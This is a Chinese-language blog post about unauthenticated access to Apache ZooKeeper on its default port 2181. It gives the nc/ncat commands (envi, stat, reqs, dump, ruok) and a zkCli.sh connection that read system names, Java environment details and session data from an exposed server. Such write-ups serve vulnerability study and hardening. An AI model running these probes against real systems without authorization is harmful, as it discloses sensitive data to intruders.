首页 > 其他分享 >zookeeper未授权访问(CVE-2014-085)

zookeeper未授权访问(CVE-2014-085)

时间:2024-07-30 22:39:35浏览次数:7  
标签:127.0 0.1 zookeeper envi 085 echo 2181 2014 ncat

漏洞描述

默认安装配置完的zookeeper允许未授权访问,管理员未配置访问控制列表(ACL)。导致攻击者可以在默认开放的2181端口下通过执行envi命令获得大量敏感信息(系统名称、java环境)导致任意用户可以在网络不受限的情况下进行未授权访问读取数据

漏洞影响

Apache ZooKeeper

漏洞复现

Apache ZooKeeper 默认开放2181端口 ,使用如下命令获取敏感数据

echo envi | nc xxx.xxx.xxx.xxx 2181
1、stat:列出关于性能和连接的客户端的统计信息。
echo stat |ncat 127.0.0.1 2181

2、ruok:测试服务器是否运行在非错误状态。
echo ruok |ncat 127.0.0.1 2181

3、reqs:列出未完成的请求。
echo reqs |ncat 127.0.0.1 2181

4、envi:打印有关服务环境的详细信息。
echo envi |ncat 127.0.0.1 2181

5、dump:列出未完成的会话和临时节点。
echo dump |ncat 127.0.0.1 2181

漏洞证明

尝试连接

./zkCli.sh -server  192.168.133.132 2181

通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
image

标签:127.0,0.1,zookeeper,envi,085,echo,2181,2014,ncat
From: https://www.cnblogs.com/alwaysz/p/18333485

相关文章

  • SQLSTATE[HY000]: General error: 2014 Cannot execute queries while other unbuffer
     SQLSTATE[HY000]:Generalerror:2014Cannotexecutequerieswhileotherunbufferedqueriesareactive.ConsiderusingPDOStatement::fetchAll().Alternatively,ifyourcodeisonlyevergoingtorunagainstmysql,youmayenablequerybufferingbysetti......
  • zookeeper、kafka单机版安装 https://www.cnblogs.com/dogleftover
    zookeeper、kafka单机版安装前提已经安装了jdk1.8、zookeeper3.6.3主机名:master映射:192.168.128.129master安装zookeeper单机版#将apache-zookeeper-3.6.3-bin.tar.gz上传到服务器#解压tar-zxvfapache-zookeeper-3.6.3-bin.tar.gz#移动mv/home/apache-zookeeper-3......
  • CCF-CSP 201412-1 门禁系统
    一、问题描述问题描述涛涛最近要负责图书馆的管理工作,需要记录下每天读者的到访情况。每位读者有一个编号,每条记录用读者的编号来表示。给出读者的来访记录,请问每一条记录中的读者是第几次出现。输入格式输入的第一行包含一个整数n,表示涛涛的记录条数。第二行......
  • 币安实时交易 - APIError(code=-2014): API 密钥格式无效
    使用我的api_key从币安导入数据后,我在请求帐户信息时遇到问题。我正在编写一个脚本,允许使用(PythonBinanceWebsocket)获取实时“MATICUSDT”数据。创建历史线数据帧时,脚本运行完全正常,但不会返回帐户信息。错误:BinanceAPIException:APIError(code=-2014):API密钥格式无效。......
  • 1085:球弹跳高度的计算
    1085:球弹跳高度的计算时间限制:1000ms      内存限制:65536KB提交数:113035   通过数: 63349【题目描述】一球从某一高度$h$落下(单位米),每次落地后反跳回原来高度的一半,再落下。编程计算气球在第$10$次落地时,共经过多少米?第$10$次反弹多高?输出包含......
  • P3572 [POI2014] PTA-Little Bird
    原题链接题解首先,考虑接下来往哪颗树飞是很困难的,因为当前的决策会影响之后的决策但是如果考虑到达当前树从哪里飞过来就比较好了,因为无后效性接着我们可以暴力做法,遍历每棵树从前\(k\)个树飞过来的值,然后取最小的那个,但是这样显然会超时,所以我们优化一下有哪些值得被优化......
  • Docker-Compose配置zookeeper+KaFka+CMAK简单集群
    1. 本地DNS解析管理#编辑hosts文件sudonano/etc/hosts#添加以下三个主机IP192.168.186.77zoo1k1192.168.186.18zoo2k2192.168.186.216zoo3k3注:zoo1是192.168.186.77的别名,zoo2是192.168.186.18的别名,zoo3是192.168.186.126的别名,IP自行修改即可,其他配置可以......
  • 实现分布式锁,Zookeeper 与 Redis 哪个更好一点?
    1.为什么使用分布式锁?分布式锁有什么用途?(1)使用分布式锁的目的使用分布式锁的目的很简单,就是为了保证在同一时间里面,只有一个JVM进程可以实现对于共享资源的操作。确保数据的一致性在分布式环境中,多个节点可能会同时访问和修改同一数据或资源。分布式锁可以确保在任......
  • (nice!!!)LeetCode 3085. 成为 K 特殊字符串需要删除的最少字符数(贪心、哈希表、字符串)
    3085.成为K特殊字符串需要删除的最少字符数思路:1、用哈希表mp先统计出字符串word中所有字母出现的次数2、将哈希表里的次数进行升序排序v3、采用贪心的策略,删除最少的字符串,就是保留最大的字符串。可知,最少有一个元素的数量不需要改变。那么我们就枚举这个数量v[i],......
  • php连接sql server 2014踩坑及处理记录
    1.PDOException:SQLSTATE[42S02]:[Microsoft][ODBCDriver17forSQLServer][SQLServer]对象名'dbotest'无效。 使用thinkphp/laravel连接sqlserver提示上述错误,检查为设置了数据库前缀dbo,取消后读取正常,sqlserver2014中表名前会自动加dbo,无需设置数据库前缀dbo,在SQ......